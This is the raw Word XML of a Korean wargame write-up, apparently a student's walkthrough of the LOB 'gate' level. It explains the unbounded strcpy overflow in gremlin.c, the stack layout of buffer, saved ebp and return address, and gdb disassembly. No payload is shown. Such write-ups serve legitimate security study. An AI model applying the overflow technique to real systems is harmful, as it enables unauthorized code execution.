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06"/>
        <w:gridCol w:w="2657"/>
        <w:gridCol w:w="2461"/>
        <w:gridCol w:w="2632"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B012B" w:rsidTr="007B012B">
        <w:trPr>
          <w:trHeight w:val="706"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10603" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="007B012B" w:rsidRDefault="007B012B" w:rsidP="007B012B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007B012B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>LOB GATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B012B" w:rsidTr="007B012B">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007B012B" w:rsidRDefault="007B012B" w:rsidP="007B012B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>COLONY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007B012B" w:rsidRDefault="007B012B" w:rsidP="007B012B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>동아대학교</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007B012B" w:rsidRDefault="007B012B" w:rsidP="007B012B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>김영진</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007B012B" w:rsidRDefault="007B012B" w:rsidP="007B012B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2017.01.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B012B" w:rsidRPr="00C155D2" w:rsidTr="007B012B">
        <w:trPr>
          <w:trHeight w:val="14152"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10603" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00AA4761" w:rsidRDefault="00AA4761"/>
          <w:p w:rsidR="007B012B" w:rsidRDefault="006140B4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>LOB gate</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>문제풀이 시작하겠습니다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006140B4" w:rsidRDefault="006140B4">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2750A847" wp14:editId="6FCE74DF">
                  <wp:extent cx="6105525" cy="90487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40B4" w:rsidRDefault="006140B4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">먼저 원래 있던 </w:t>
            </w:r>
            <w:r>
              <w:t>gremlin, gremlin.c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 를 제 폴더를 하나 만들어 옴겼습니다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006140B4" w:rsidRDefault="006140B4">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">옴기는 과정에서 </w:t>
            </w:r>
            <w:r>
              <w:t>uid gid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 가 </w:t>
            </w:r>
            <w:r>
              <w:t>gate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>로 변경 됬습니다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA4761" w:rsidRPr="009A4CE8" w:rsidRDefault="00AA4761"/>
          <w:p w:rsidR="00AA4761" w:rsidRPr="00AA4761" w:rsidRDefault="00AA4761">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">공격할 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">gremlin.c </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>의 소스를 확인해 봅시다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AA4761" w:rsidRDefault="00AA4761">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="612B94D9" wp14:editId="1B0B06E8">
                  <wp:extent cx="6076950" cy="26098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6950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7FED" w:rsidRDefault="00B77FED"/>
          <w:p w:rsidR="00B77FED" w:rsidRPr="00AA4761" w:rsidRDefault="00AA4761">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>trcpy(buffer, argv[</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">); </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">에서 버퍼가 받아들이는 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>arg</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">v의 크기가 정해지지 않아 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>buffer over flow</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4761">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>가 발생합니다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761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87630</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6238875" cy="1085850"/>
                      <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="3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38875" cy="1085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4761" w:rsidRDefault="00AA4761" w:rsidP="00AA4761">
                                  <w:pPr>
                                    <w:jc w:val="lef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Argc = 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취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약한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 소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스코드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gremlin.c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가 컴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파일되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어 실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행되는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 프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로그램의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AA4761">
                                    <w:rPr>
                                      <w:rFonts w:hint="eastAsia"/>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                      <w:u w:val="single"/>
                                    </w:rPr>
                                    <w:t>인</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00AA4761">
                                    <w:rPr>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                      <w:u w:val="single"/>
                                    </w:rPr>
                                    <w:t>자</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00AA4761">
                                    <w:rPr>
                                      <w:rFonts w:hint="eastAsia"/>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                      <w:u w:val="single"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve"> 개</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00AA4761">
                                    <w:rPr>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                      <w:u w:val="single"/>
                                    </w:rPr>
                                    <w:t>수</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED">
                                    <w:rPr>
                                      <w:rFonts w:hint="eastAsia"/>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                      <w:u w:val="single"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve"> (안</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED">
                                    <w:rPr>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                      <w:u w:val="single"/>
                                    </w:rPr>
                                    <w:t>정해짐</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED">
                                    <w:rPr>
                                      <w:rFonts w:hint="eastAsia"/>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                      <w:u w:val="single"/>
                                    </w:rPr>
                                    <w:t>!)</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w:rsidR="00AA4761" w:rsidRDefault="00AA4761" w:rsidP="00AA4761">
                                  <w:pPr>
                                    <w:jc w:val="lef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rgv[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0] = </w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED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실</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED">
                                    <w:rPr>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                    </w:rPr>
                                    <w:t>행</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED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 파</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED">
                                    <w:rPr>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                    </w:rPr>
                                    <w:t>일의</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED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 이</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00B77FED">
                                    <w:rPr>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                    </w:rPr>
                                    <w:t>름</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761">
                                  <w:pPr>
                                    <w:jc w:val="lef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rgv[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1] = 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실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행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파일의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 첫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번재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 인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자</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761">
                                  <w:pPr>
                                    <w:jc w:val="lef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rgv[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2] = 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실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행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 파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일의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 두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번째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 인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3" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1.1pt;margin-top:6.9pt;width:491.25pt;height:8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AxFuAIAAMQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHfTpg1RN1XUqgip&#10;aita1LPjtbMreT3GdpINt/IOSLwBFw48FyrvwNj70x8qkBA5OOOdmW9mPs/M4VFTK7IW1lWgc5rt&#10;pJQIzaGo9DKn769PX00ocZ7pginQIqdb4ejR7OWLw42ZihGUoAphCYJoN92YnJbem2mSOF6Kmrkd&#10;MEKjUoKtmcerXSaFZRtEr1UyStP9ZAO2MBa4cA6/nrRKOov4UgruL6R0whOVU8zNx9PGcxHOZHbI&#10;pkvLTFnxLg32D1nUrNIYdIA6YZ6Rla1+g6orbsGB9Dsc6gSkrLiINWA1WfqkmquSGRFrQXKcGWhy&#10;/w+Wn68vLamKnO5SolmNT3T39fbu07cf329/fvlMdgNDG+OmaHhlLm13cyiGchtp6/CPhZAmsrod&#10;WBWNJxw/7o92J5ODMSUcdVk6GU/Gkffk3t1Y598IqEkQcmrx2SKbbH3mPIZE094kRHOgquK0Uipe&#10;QquIY2XJmuEjL5ZZSBk9HlkpTTZYY4Z5/A3BN88gIJ7SCBuoaIuPkt8qEfCUfick0ojljtoAj7Ni&#10;nAvts1ZVskK0yY5T/PXp9h4x+QgYkCWWOWB3AL1lC9Jjt1V39sFVxP4fnNM/JdY6Dx4xMmg/ONeV&#10;BvscgMKqusitfU9SS01gyTeLBk2CuIBii/1moR1EZ/hphU9+xpy/ZBYnD2cUt4m/wEMqwCeDTqKk&#10;BPvxue/BHgcCtZRscJJz6j6smBWUqLcaR+V1trcXRj9e9sYHI7zYh5rFQ41e1ceAfZTh3jI8isHe&#10;q16UFuobXDrzEBVVTHOMnVPubX859u2GwbXFxXwezXDcDfNn+srwAB4IDi193dwwa7q+9zgy59BP&#10;PZs+af/WNnhqmK88yCrOxj2vHfW4KmIPdWst7KKH92h1v3xnvwAAAP//AwBQSwMEFAAGAAgAAAAh&#10;AMZIjIPdAAAACAEAAA8AAABkcnMvZG93bnJldi54bWxMj09PhDAQxe8mfodmTLy5RURFpGyMif8O&#10;HlxNvM7SQgl0Smh3gW/veNLjvPfy5vfK7eIGcTRT6DwpuNwkIAzVXnfUKvj6fLrIQYSIpHHwZBSs&#10;JsC2Oj0psdB+pg9z3MVWcAmFAhXYGMdCylBb4zBs/GiIvcZPDiOfUyv1hDOXu0GmSXIjHXbEHyyO&#10;5tGaut8dnIL+/a3vxte8aZ7tej2v+B2X7EWp87Pl4R5ENEv8C8MvPqNDxUx7fyAdxKAgTTnI8hUP&#10;YPsuz25B7FnIsxxkVcr/A6ofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHOoDEW4AgAA&#10;xAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAMZIjIPd&#10;AAAACAEAAA8AAAAAAAAAAAAAAAAAEgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAc&#10;BgAAAAA=&#10;" fillcolor="white [3212]" strokecolor="black [3213]" strokeweight=".25pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w:rsidR="00AA4761" w:rsidRDefault="00AA4761" w:rsidP="00AA4761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Argc =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취</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>약한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소</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>스코드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gremlin.c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가 컴</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>파일되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어 실</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>행되는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프</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>로그램의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AA4761"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  <w:t>인</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AA4761">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>자</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AA4761"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  <w:t xml:space="preserve"> 개</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AA4761">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>수</w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED"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  <w:t xml:space="preserve"> (안</w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>정해짐</w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED"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  <w:t>!)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00AA4761" w:rsidRDefault="00AA4761" w:rsidP="00AA4761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rgv[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0] = </w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>실</w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>행</w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 파</w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>일의</w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 이</w:t>
                            </w:r>
                            <w:r w:rsidR="00B77FED">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>름</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761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rgv[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1] =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실</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>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파일의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첫</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>번재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인</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>자</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761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rgv[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2] =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실</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>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파</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>일의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두</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>번째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인</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>자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77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761"/>
          <w:p w:rsidR="00AA4761" w:rsidRDefault="00AA4761" w:rsidP="00AA4761"/>
          <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761"/>
          <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761"/>
          <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761"/>
          <w:p w:rsidR="00B77FED" w:rsidRDefault="00B77FED" w:rsidP="00AA4761">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">소스코드를 보면 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[ buffer(256)] + [ ebp(4) ] + [ ret(4) ] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>로 되어있을</w:t>
            </w:r>
            <w:r w:rsidR="00DF155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것으로 예상이 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B77FED" w:rsidRDefault="00C155D2" w:rsidP="00AA4761">
            <w:r>
              <w:t>gdb</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>로 어셈블리어가 어떤 식으로 되어있는지 확인 해 봅시다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C155D2" w:rsidRDefault="00C155D2" w:rsidP="00AA4761">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D711A85" wp14:editId="2CEF058D">
                  <wp:extent cx="6076950" cy="16764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695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55D2" w:rsidRPr="00AA4761" w:rsidRDefault="00C155D2" w:rsidP="00AA4761">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>인텔 방식으로 전환해서 다시 디스어셈블 한다.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>다들 이방식을 사용 하시는 것 같아서</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006140B4" w:rsidRPr="00B77FED" w:rsidTr="007B012B">
        <w:trPr>
          <w:trHeight w:val="14152"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10603" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="006140B4" w:rsidRDefault="00C155D2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4110950E" wp14:editId="49EE1296">
                  <wp:extent cx="6124575" cy="6591300"/>
                  <wp:effectExtent l="0" t="0" r="952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659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55D2" w:rsidRDefault="00C155D2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E71A2C4" wp14:editId="087E0CC0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>13969</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>60325</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4657725" cy="762000"/>
                      <wp:effectExtent l="0" t="0" r="28575" b="19050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57725" cy="762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155D2" w:rsidRDefault="00C155D2" w:rsidP="00C155D2">
                                  <w:pPr>
                                    <w:jc w:val="lef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인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텔방식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 어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셈블리어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 표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기법</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w:rsidR="00C155D2" w:rsidRDefault="00C155D2" w:rsidP="00C155D2">
                                  <w:pPr>
                                    <w:jc w:val="lef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[명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령어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]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  [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목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적지]   [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출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발지]</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w:rsidR="00DF155F" w:rsidRPr="00C155D2" w:rsidRDefault="00DF155F" w:rsidP="00DF155F">
                                  <w:pPr>
                                    <w:ind w:firstLineChars="450" w:firstLine="900"/>
                                    <w:jc w:val="left"/>
                                    <w:rPr>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r w:rsidRPr="00DF155F">
                                    <w:rPr>
                                      <w:color w:val="000000" w:themeColor="text1"/>
                                    </w:rPr>
                                    <w:sym w:font="Wingdings" w:char="F0DF"/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-------------------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71A2C4" id="직사각형 7" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:1.1pt;margin-top:4.75pt;width:366.7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SPKuwIAAMoFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r46zpNmCOkXQosOA&#10;oi3WDj0rshQbkEVNUmJnt+4fCuwPdtlh3zV0/zBKdpy2C3YYdrFFkXwkn0geHTeVImthXQk6o+nB&#10;gBKhOeSlXmb0483ZqzeUOM90zhRokdGNcPR49vLFUW2mYggFqFxYgiDaTWuT0cJ7M00SxwtRMXcA&#10;RmhUSrAV8yjaZZJbViN6pZLhYHCY1GBzY4EL5/D2tFXSWcSXUnB/KaUTnqiMYm4+fm38LsI3mR2x&#10;6dIyU5S8S4P9QxYVKzUG7aFOmWdkZcs/oKqSW3Ag/QGHKgEpSy5iDVhNOnhWzXXBjIi1IDnO9DS5&#10;/wfLL9ZXlpR5RieUaFbhEz18u3v48v3nj7tfX+/JJDBUGzdFw2tzZTvJ4TGU20hbhT8WQprI6qZn&#10;VTSecLwcHY4nk+GYEo66ySG+WqQ92Xkb6/w7ARUJh4xafLVIJlufO48R0XRrEoI5UGV+VioVhdAp&#10;4kRZsmb4xotlGjJGjydWSpM6o6/TyTgCP9HFXtsh+GYPAuIpjbCBibb2ePIbJUISSn8QElnEaodt&#10;gKdZMc6F9mmrKlgu2mTHSMWWiz6LmHwEDMgSy+yxO4D92G3VnX1wFbH9e+fB3xJrnXuPGBm0752r&#10;UoPdB6Cwqi5ya78lqaUmsOSbRRM7LFqGmwXkG+w6C+04OsPPSnz5c+b8FbM4fzipuFP8JX6kAnw5&#10;6E6UFGA/77sP9jgWqKWkxnnOqPu0YlZQot5rHJi36WgUFkAURuPJEAX7WLN4rNGr6gSwnVLcXobH&#10;Y7D3anuUFqpbXD3zEBVVTHOMnVHu7VY48e2eweXFxXwezXDoDfPn+trwAB54Dp1909wya7r29zg4&#10;F7CdfTZ9NgWtbfDUMF95kGUckR2v3Qvgwoit1C23sJEey9Fqt4JnvwEAAP//AwBQSwMEFAAGAAgA&#10;AAAhAHQoVP7cAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMjstOwzAQRfdI/IM1SOyoQyC0hDgV&#10;QuLRBQsKEttp7MRR4nEUu03y9wwrWM69R3dOsZ1dL05mDK0nBderBIShyuuWGgVfn89XGxAhImns&#10;PRkFiwmwLc/PCsy1n+jDnPaxETxCIUcFNsYhlzJU1jgMKz8Y4q72o8PI59hIPeLE466XaZLcSYct&#10;8QeLg3mypur2R6ege9917fC2qesXu2TTgt9xvn1V6vJifnwAEc0c/2D41Wd1KNnp4I+kg+gVpCmD&#10;Cu4zENyub7I1iANjKSeyLOR///IHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAG70jyrsC&#10;AADKBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAdChU&#10;/twAAAAHAQAADwAAAAAAAAAAAAAAAAAVBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AB4GAAAAAA==&#10;" fillcolor="white [3212]" strokecolor="black [3213]" strokeweight=".25pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w:rsidR="00C155D2" w:rsidRDefault="00C155D2" w:rsidP="00C155D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인</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>텔방식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어</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>셈블리어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표</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>기법</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00C155D2" w:rsidRDefault="00C155D2" w:rsidP="00C155D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[명</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>령어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]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[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목</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>적지]   [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출</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>발지]</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00DF155F" w:rsidRPr="00C155D2" w:rsidRDefault="00DF155F" w:rsidP="00DF155F">
